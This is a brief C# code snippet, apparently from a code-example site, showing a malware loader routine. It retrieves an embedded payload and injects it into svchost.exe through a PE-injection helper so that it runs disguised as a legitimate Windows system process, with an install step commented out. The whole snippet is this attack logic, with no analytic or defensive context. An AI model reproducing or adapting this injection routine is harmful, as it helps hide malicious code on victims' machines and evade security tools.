示例#1
0
    public static void method1()
    {
        byte[] Payload = ResourceGetter.GetPayload();

        string sysPath      = Environment.GetFolderPath(Environment.SpecialFolder.System);
        string winLogonPath = Path.Combine(sysPath, "svchost.exe");

        //            Installer.InstallFile();

        pe_injector.RunExecRoutine(Payload, winLogonPath, string.Empty);
    }